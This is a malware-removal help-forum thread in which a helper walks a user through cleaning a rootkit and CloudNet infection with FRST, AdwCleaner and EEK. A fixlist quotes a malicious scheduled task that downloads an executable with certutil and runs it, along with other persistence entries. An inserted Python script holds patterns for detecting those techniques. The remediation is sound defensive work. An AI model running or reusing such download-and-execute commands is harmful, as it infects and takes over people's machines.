Jang9

CLOSED HELP! Rootkit and Cloudnet virus

I have this impossible-to-delete-without-damaging-your-computer rootkit problem and I don't know if it's this Cloudnet malware. I cannot access Windows Defender either, and I tried many things manually. Also, when I run an EEK scan, after the results an 'Activate EEK protection' download pops up, but then it says that something is wrong.

 

scan_180605-154342.txt

Addition_05-06-2018 15.51.50.txt

FRST_05-06-2018 15.51.50.txt


Jang9,

I see a few things that do need to be taken care of. In short, your machine was infected, yes; but it still is. The first and most major step is killing the most invasive infection on the computer, and the one responsible for our program not installing properly: SmartService.

Please read through these instructions before starting. If you think you can handle all this, move forward. If you don't, please get someone involved who can.

SmartService IS possible to remove, and for someone savvy enough, actually pretty easy. For most people though, SmartService is a pretty big pain to remove. Do you have access to a clean, uninfected Windows 10 machine? If you do, we can use the recovery environment of a Windows 10 installation USB stick (8GB or larger, you'll need one of those too) to get rid of it.

Things to consider:
1. SmartService disables recovery mode in Windows 10, so we have to make a recovery boot USB stick from a clean computer, and configure the infected computer to boot from it.
2. SmartService knows how to patch FRST64.exe so it will not run in recovery mode, so we must make sure SmartService never 'sees' the FRST64.exe program used for this next set of steps.
3. If regular Windows boots while either the Windows 10 recovery USB stick or the FRST USB stick are inserted, you need to format the USB stick and start over. It is safe to format it using the clean computer.

How savvy are you with such things? Here's what to do:

1. Create a Windows 10 recovery USB stick: https://www.techrepublic.com/article/be-prepared-create-a-windows-10-recovery-drive/
2. Using the clean machine, download a fresh copy of FRST64.exe that has never touched the 'sick' machine, and copy it to a separate USB stick. DO NOT INSERT THE USB STICK INTO THE 'SICK' MACHINE YET.
3. Once you're ready with the USB stick and the Windows 10 recovery USB stick (yes, two sticks), shut down the sick computer completely. As in shut down, power off. Follow the instructions here to boot from the Windows 10 recovery USB stick: https://craftedflash.com/info/how-boot-computer-from-usb-flash-drive
4. Use the Repair -> Troubleshoot -> Command Prompt option within recovery mode. Once there, plug in the second USB stick that has FRST64 on it. Find your USB drive by running notepad.exe, clicking File->Open, then noting which drive says "Boot". Normally that is D: or E:, depending on how many drives are in your machine.  Either way, we're looking for the USB stick drive letter. You can also find it by typing (in the command prompt) "dir d:", "dir e:" etc. until you find the FRST64.exe program you downloaded earlier.
5. Type "FRST64" to run it. Click the Scan button. Please send the FRST.txt file that it creates. If all goes well, FRST64 will have killed the SmartService driver, and you'll be able to reboot into normal mode where we can finish the removal.

If these instructions are too much, it may be better to get someone involved who has enough experience to do it - while this is not an inherently dangerous exercise, it's not exactly for the faint of heart.

Until SmartService is killed, nothing we do on this machine is going to work properly in the way of getting rid of malware.


OK, restart to normal mode and run a fresh scan with FRST. Attach the new FRST scan report to your reply.


Please run FRST again. Next, select and copy the following text, including the words Start:: and End::. Switch back to the FRST program window, and click the Fix button. It should read the fix directly from the clipboard and run the fix. When it is finished, please attach the fixlog.txt file it created in the same folder the FRST program is in.

Start::
    HKLM\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\app.ex
    HKLM-x32\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\app.ex
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [CHGLut61UO.exe] => C:\Program Files\HP\0KJNXAMZV\CHGLut61UO.exe
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [1YSTTJ7UVGN1NM0] => "C:\Program Files\JRGW4ZQGZV\JRGW4ZQGZ.exe"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [VI5IY2IIMOR4850] => "C:\Program Files (x86)\cyjrr1tb5ol\S2L8Q.exe"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [WinterWind] => C:\Windows\rss\csrss.exe [3189248 2018-06-03] () <==== ATTENTION
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [5364211] => "C:\Users\lulul\AppData\Roaming\xnsclsxytt2\sqjeg5z1rnp.exe" /VERYSILENT
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [C2G22IOHT0D7RM2] => "C:\Program Files\7GAONO7TA5\7GAONO7TA.exe"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [CloudNet] => C:\Users\lulul\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-11] (EpicNet Inc.) <==== ATTENTION
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
    AppInit_DLLs: C:\ProgramData\AppriabuS\Fresh-Find.dll => No File
    AppInit_DLLs-x32: C:\ProgramData\AppriabuS\Unolam.dll => No File
    ShellExecuteHooks: No Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\system32\mcicda64.dll -> No File <==== ATTENTION
    GroupPolicy: Restriction ? <==== ATTENTION
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYgxQ6nGkfirS7xmUcGkGorXFDM9Gdp24H7dk068pRXKjB-g5zpzX8dEn-Vxy0dln1uCduxae-vo_TU2-gQaFO4Q4REqoRml1EB2QaNLgcA8jQIoAmQkkNxsDYpbzqWu6P3OVbnemRNuGR0LYB-rc7hlRWrkglNqkTaujVyonWvAQ,,&q={searchTerms}
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYgxQ6nGkfirS7xmUcGkGorXFDM9Gdp24H7dk068pRXKjB-g5zpzX8dEn-Vxy0dln1uCduxae-vo_TU14WfVorckhuLcB4ERczoSMs6EyQ5G-F7KoxaK-pyuUPUjLpWgjFYU5hsBNxPFw53uJR6yzNTbR_94KGtcDRnkpm9dnT6wA,,
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYgxQ6nGkfirS7xmUcGkGorXFDM9Gdp24H7dk068pRXKjB-g5zpzX8dEn-Vxy0dln1uCduxae-vo_TU2-gQaFO4Q4REqoRml1EB2QaNLgcA8jQIoAmQkkNxsDYpbzqWu6P3OVbnemRNuGR0LYB-rc7hlRWrkglNqkTaujVyonWvAQ,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-2635990016-3569543676-633003942-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYgxQ6nGkfirS7xmUcGkGorXFDM9Gdp24H7dk068pRXKjB-g5zpzX8dEn-Vxy0dln1uCduxae-vo_TU2-gQaFO4Q4REqoRml1EB2QaNLgcA8jQIoAmQkkNxsDYpbzqWu6P3OVbnemRNuGR0LYB-rc7hlRWrkglNqkTaujVyonWvAQ,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-2635990016-3569543676-633003942-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYgxQ6nGkfirS7xmUcGkGorXFDM9Gdp24H7dk068pRXKjB-g5zpzX8dEn-Vxy0dln1uCduxae-vo_TU2-gQaFO4Q4REqoRml1EB2QaNLgcA8jQIoAmQkkNxsDYpbzqWu6P3OVbnemRNuGR0LYB-rc7hlRWrkglNqkTaujVyonWvAQ,,&q={searchTerms}
    S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64x.exe [593920 2018-06-07] (SystemaRev) [File not signed] <==== ATTENTION
    R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
    S2 73817c8d47bae36ed906fa532617a2eb; rundll32.exe C:\Windows\zeweuslocxykzkso.zewe qBeJW [X]
    S2 a2b51fb0966f086f096c4a3ca96428e4; C:\Program Files\a2b51fb0966f086f096c4a3ca96428e4\dda09f7047d145f492dd2329a91b1425.exe [X]
    S2 AppriabuS; C:\ProgramData\\AppriabuS\\AppriabuS.exe shuz -f "C:\ProgramData\\AppriabuS\\AppriabuS.dat" -l -a
    S2 backlh; C:\ProgramData\Logic Cramble\set.exe [X] <==== ATTENTION
    S2 dahkService; C:\ProgramData\dahkService\dahkService.exe -s 25 [X]
    S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ATTENTION
    S2 saiyitechnology; C:\ProgramData\yahoochrome_D\desktop46.exe [X]
    R2 TCPSvc; "C:\Users\lulul\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\lulul\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\lulul\AppData\Local\Temp\csrss\proxy\t" <==== ATTENTION
    R1 52062e3be9a45d6ecc7f5f83ba955418; C:\Windows\System32\drivers\52062e3be9a45d6ecc7f5f83ba955418.sys [211632 2018-06-02] ()
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zero byte File/Folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-06-03] () [File not signed] <==== ATTENTION
    S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
    S1 zpxlegso; \??\C:\Windows\system32\drivers\zpxlegso.sys [X]
    2018-06-04 00:00 - 2018-06-04 00:00 - 000000000 ____D C:\ProgramData\SystemaRev
    2018-06-03 22:11 - 2018-06-03 22:11 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2018-06-03 22:10 - 2018-06-11 18:14 - 000003270 _____ C:\Windows\System32\Tasks\csrss
    2018-06-03 22:10 - 2018-06-03 22:10 - 000003674 _____ C:\Windows\System32\Tasks\FastDataX Task
    2018-06-03 22:09 - 2018-06-09 21:20 - 000003878 _____ C:\Windows\System32\Tasks\MainPMgr
    2018-06-03 22:09 - 2018-06-03 22:09 - 000000000 ____D C:\Program Files\SystemaRev
    2018-06-03 22:07 - 2018-06-03 22:08 - 000000000 ____D C:\Users\lulul\AppData\Local\55939425818d4a94a6f77851d1cab5f0
    2018-06-03 22:06 - 2018-06-04 00:22 - 000000000 ____D C:\ProgramData\dahkService
    2018-06-03 22:06 - 2018-06-04 00:22 - 000000000 ____D C:\Program Files (x86)\cyjrr1tb5ol
    2018-06-03 22:05 - 2018-06-04 00:20 - 000000000 ____D C:\Program Files (x86)\XXCCXXC
    2018-06-02 02:25 - 2018-06-02 02:25 - 001890304 _____ C:\Windows\e61fc1e00dd30cf136e6f36c52e8653a.exe
    2018-06-02 02:25 - 2018-06-02 02:25 - 000211632 _____ C:\Windows\system32\Drivers\52062e3be9a45d6ecc7f5f83ba955418.sys
    2018-06-01 12:18 - 2018-06-01 12:38 - 000000000 ____D C:\ProgramData\KMSAutoS
    2018-06-03 22:12 - 2018-06-03 22:12 - 007627776 _____ () C:\Users\lulul\AppData\Local\agent.dat
    2018-06-03 22:12 - 2018-06-03 22:12 - 000070896 _____ () C:\Users\lulul\AppData\Local\Config.xml
    1601-01-03 21:33 - 1601-01-03 21:33 - 000058368 ____N (Microsoft Corporation) C:\Users\lulul\AppData\Local\IbQYMoznH.exe
    1601-01-03 21:33 - 1601-01-03 21:33 - 000180736 ____N (Microsoft Corporation) C:\Users\lulul\AppData\Local\igsIGLuiFo.exe
    2018-06-03 22:10 - 2018-06-03 22:13 - 000016080 _____ () C:\Users\lulul\AppData\Local\InstallationConfiguration.xml
    2018-06-03 22:10 - 2018-06-03 22:10 - 000140800 _____ () C:\Users\lulul\AppData\Local\installer.dat
    2018-06-03 22:12 - 2018-06-03 22:12 - 000005568 _____ () C:\Users\lulul\AppData\Local\md.xml
    2018-06-03 22:12 - 2018-06-03 22:12 - 000126464 _____ () C:\Users\lulul\AppData\Local\noah.dat
    2018-06-03 22:10 - 2018-06-03 23:49 - 000929792 _____ () C:\Users\lulul\AppData\Local\sham.db
    2018-06-03 22:12 - 2018-06-03 22:12 - 001989159 _____ () C:\Users\lulul\AppData\Local\SunHold.tst
    2018-06-03 22:13 - 2018-06-03 22:13 - 001895383 _____ () C:\Users\lulul\AppData\Local\Trustfind.bin
    2018-06-03 22:13 - 2018-06-03 22:13 - 000032038 _____ () C:\Users\lulul\AppData\Local\uninstall_temp.ico
    2018-06-03 22:06 - 2018-06-03 22:06 - 000000003 _____ () C:\Users\lulul\AppData\Local\wbem.ini
    C:\Windows\rss\csrss.exe
    C:\Users\lulul\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    2018-06-03 22:10 - 2018-06-03 22:48 - 001527488 _____ (Microsoft Corporation) C:\Users\lulul\AppData\Local\Temp\dbghelp.dll
    2018-06-03 22:05 - 2018-06-03 22:09 - 013205167 _____ (MAL                                                         ) C:\Users\lulul\AppData\Local\Temp\gkabxtkbcbs.exe
    2018-06-03 22:04 - 2018-06-03 22:04 - 001794678 _____ () C:\Users\lulul\AppData\Local\Temp\nozama-bn.exe
    2018-06-03 22:05 - 2018-06-03 22:06 - 000549100 _____ (ZRFXRD                                                      ) C:\Users\lulul\AppData\Local\Temp\Package.exe
    2018-06-03 22:08 - 2018-06-03 22:09 - 007204868 _____ () C:\Users\lulul\AppData\Local\Temp\s2s.exe
    2018-06-03 22:05 - 2018-06-03 22:05 - 000793109 _____ (                                                            ) C:\Users\lulul\AppData\Local\Temp\setup.exe
    2018-06-03 22:07 - 2018-06-03 22:07 - 000775144 _____ (                                                            ) C:\Users\lulul\AppData\Local\Temp\setupAB.exe
    2018-06-03 22:10 - 2018-06-03 22:48 - 000167616 _____ (Microsoft Corporation) C:\Users\lulul\AppData\Local\Temp\symsrv.dll
    2018-06-03 22:05 - 2018-06-03 22:06 - 004510058 _____ (TigerTrade                                                  ) C:\Users\lulul\AppData\Local\Temp\TradeSetup_upd.exe
    2018-06-03 22:11 - 2018-06-03 22:07 - 000099900 _____ () C:\Users\lulul\AppData\Local\Temp\Uninstall.exe
    2018-06-03 22:09 - 2018-06-03 22:10 - 001131341 _____ (                                                            ) C:\Users\lulul\AppData\Local\Temp\whiteclick.exe
    ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll -> No File
    ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
    Task: {049D6DCB-A3E3-4CE2-B5AF-9297B2569BCD} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-03] () <==== ATTENTION
    Task: {4B3EE964-F2E9-4EFC-B21B-F3E657626200} - System32\Tasks\Facebook Copy => C:\Windows\system32\rundll32.exe "C:\Program Files\Facebook Copy\Facebook Copy.dll",GpbvrpVqXa <==== ATTENTION
    Task: {4B71A3A5-5981-4241-A982-B1E8D44001B5} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
    Task: {77CD6A86-0A40-437B-BC21-720508E831C4} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/3/app.exe C:\Users\lulul\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\lulul\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    Task: {817BDCF4-A6D3-4C7A-ACC0-780E3758F755} - \{28107D1D-247D-62BA-0EDF-56524BEBB675} -> No File <==== ATTENTION
    Task: {95E41B1F-0172-48F9-ADA1-9A1314ADF365} - System32\Tasks\Update_4.0.8 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64x.exe [2018-06-07] (SystemaRev)
    Task: {B6AC6AC4-E69A-4FB1-81CB-1A33779BF624} - \{CF77D1E3-BD61-9033-E7A8-85E6382DB3EE} -> No File <==== ATTENTION
    Task: {DC67DBC4-2AB8-47E2-9F2F-4CBA02184514} - System32\Tasks\FastDataX Task => C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE
    Task: C:\Windows\Tasks\Facebook Copy.job => rundll32.exe  C:\Program Files\Facebook Copy\Facebook Copy.dll
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\StartupApproved\Run: => "C2G22IOHT0D7RM2"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\StartupApproved\Run: => "CloudNet"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\StartupApproved\Run: => "1YSTTJ7UVGN1NM0"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\StartupApproved\Run: => "CHGLut61UO.exe"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\StartupApproved\Run: => "VI5IY2IIMOR4850"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\StartupApproved\Run: => "5364211"
    FirewallRules: [{DE8F2A9B-AD3F-48EA-8948-275E3353190D}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{05B05F2F-8506-4E5E-B9DA-92598BFE782D}] => (Allow) C:\Program Files\SystemaRev\RevServicesX\app.exe
    FirewallRules: [{615AC2F4-506F-428A-91F6-6629AB1AAAE1}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{4E1DD3E2-8DED-41DE-A9FC-794AA2243CCC}] => (Allow) C:\Users\lulul\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
End::

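The fixlist above mixes several kinds of persistence (Run keys, services and drivers, scheduled tasks). As an added illustration, not part of the thread and not FRST's or Emsisoft's own code, the following Python sketch triages FRST-style log lines with a few defensive heuristics; the rule names, the `triage` helper and the line-format assumptions are hypothetical and inferred only from the lines shown in this thread.

```python
import ntpath
import re

# Lines taken from the fixlist in this thread (abridged, SID shortened to <SID>),
# plus one constructed benign service line (ExampleSvc) for contrast.
SAMPLE = r"""
HKU\<SID>\...\Run: [WinterWind] => C:\Windows\rss\csrss.exe [3189248 2018-06-03] () <==== ATTENTION
R2 TCPSvc; "C:\Users\lulul\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\lulul\AppData\Local\Temp\csrss\proxy\config" <==== ATTENTION
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-06-03] () [File not signed] <==== ATTENTION
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zero byte File/Folder)
Task: {4B71A3A5-5981-4241-A982-B1E8D44001B5} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {77CD6A86-0A40-437B-BC21-720508E831C4} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/3/app.exe C:\Users\lulul\AppData\Local\Temp\csrss\scheduled.exe <==== ATTENTION
R2 ExampleSvc; C:\Windows\System32\svchost.exe -k netsvcs [51288 2018-04-11] (Microsoft Corporation)
""".strip().splitlines()

# Names of Windows system processes that should only run from a system directory.
SYSTEM_NAMES = {"csrss.exe", "svchost.exe", "lsass.exe", "winlogon.exe", "services.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
PATH_RE = re.compile(r'[A-Za-z]:\\[^"<>|]*?\.(?:exe|dll|sys)\b', re.I)

# Text-level rules: (flag name, pattern). The last three reuse FRST's own markers.
RULES = [
    ("lolbin_download", re.compile(r"certutil(?:\.exe)?\s.*-urlcache", re.I)),
    ("ps_policy_bypass", re.compile(r"powershell(?:\.exe)?\s.*-ExecutionPolicy\s+Bypass", re.I)),
    ("unsigned", re.compile(r"\[File not signed\]")),
    ("zero_byte", re.compile(r"zero byte", re.I)),
    ("frst_attention", re.compile(r"<==== ATTENTION")),
]


def entry_kind(line):
    """Classify a log line by the prefixes seen in the thread's fixlist."""
    if line.startswith("Task:"):
        return "task"
    if re.match(r"[RS]\d\s", line):  # e.g. "R2 name; path" (service or driver)
        return "service_or_driver"
    if "\\Run:" in line:
        return "run_key"
    return "other"


def flags_for(line):
    """Return the sorted list of heuristic flags raised by one line."""
    flags = {name for name, rx in RULES if rx.search(line)}
    for path in PATH_RE.findall(line):
        folder, name = ntpath.split(path.lower())
        if name in SYSTEM_NAMES and folder not in SYSTEM_DIRS:
            flags.add("masquerade")          # system process name, wrong folder
        if "\\appdata\\" in path.lower() or "\\temp\\" in path.lower():
            flags.add("user_writable_path")  # autostart from a user-writable dir
    return sorted(flags)


def triage(lines):
    return [(entry_kind(l), flags_for(l)) for l in lines]


if __name__ == "__main__":
    for (kind, flags), line in zip(triage(SAMPLE), SAMPLE):
        print(f"{kind:18} {','.join(flags) or '-':45} {line[:60]}")
```

The MainPMgr task carries no ATTENTION marker in the log, yet the `ps_policy_bypass` rule still surfaces it, which is the reason to keep independent heuristics alongside the tool's own markers.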

That is good news.

Based on what was removed, I would like for you to run a third-party tool that targets Adware & Junkware in general.  Just to make sure we did not miss anything.

Please download AdwCleaner and save it on your desktop.

  1. Close all open programs and Internet browsers (you may want to print out or write down these instructions first).
  2. Double click on the AdwCleaner icon to run it.
  3. You will need to accept the license agreement from Malwarebytes in order to continue.
  4. Click on the Scan button in the lower-left.
  5. When the scan is done, a log will open in Notepad. You can close this Notepad window before continuing.
  6. If something was found on your computer, then click on the Clean button in the lower-left (where the "Scan" button was earlier).
  7. AdwCleaner will warn you that it will close all running processes (programs). Click OK to continue when ready.
  8. After the cleaning process is done, you will be prompted to restart your computer. Please click Reboot now when ready to restart your computer.
  9. A text file will open in Notepad after the restart (this is the log of what was removed), which you can save on your desktop.
  10. Please attach that log file to a reply for me to review.
  11. If you lose that log file for any reason, you can find it at C:\AdwCleaner[C0] on your computer.


Let's take a fresh look.

Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply.

Be sure to let me know how things are running.


Just to be safe.

Please run FRST again. Next, select and copy the following text, including the words Start:: and End::. Switch back to the FRST program window, and click the Fix button. It should read the fix directly from the clipboard and run the fix. When it is finished, please attach the fixlog.txt file it created in the same folder the FRST program is in.

Start::
    C:\Users\lulul\AppData\Local\Temp\dPXvJLk3U
    C:\Users\lulul\AppData\Local\Temp\nsb39.tmp
    C:\Users\lulul\AppData\Local\Temp\nsoFA2B.tmp
End::


Let's take a fresh look.

Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply.

Be sure to let me know how things are running.


Your system is missing the Security Update for Microsoft Windows SMB Server (4013389).

See: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

Please run FRST again. Next, select and copy the following text, including the words Start:: and End::. Switch back to the FRST program window, and click the Fix button. It should read the fix directly from the clipboard and run the fix. When it is finished, please attach the fixlog.txt file it created in the same folder the FRST program is in.

Start::
    2018-06-19 11:34 - 2018-06-19 11:34 - 000079736 _____ (AppWork GmbH) C:\Users\lulul\AppData\Local\Temp\131739032469074620.exe
    2018-06-19 11:41 - 2018-06-19 11:41 - 000035680 _____ () C:\Users\lulul\AppData\Local\Temp\i4jdel0.exe
    2018-06-19 11:37 - 2018-06-19 11:37 - 000040448 ____N () C:\Users\lulul\AppData\Local\Temp\proxy_vole6271394519320748616.dll
    2018-06-19 11:41 - 2018-06-19 11:41 - 000040448 _____ () C:\Users\lulul\AppData\Local\Temp\proxy_vole7123844085149714122.dll
End::


Let's see how well that worked.

Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply.

Be sure to let me know how things are running.


The copy of Windows 10 on this system is horribly out of date.  Why are you not keeping it updated?

This topic is now closed to further replies.
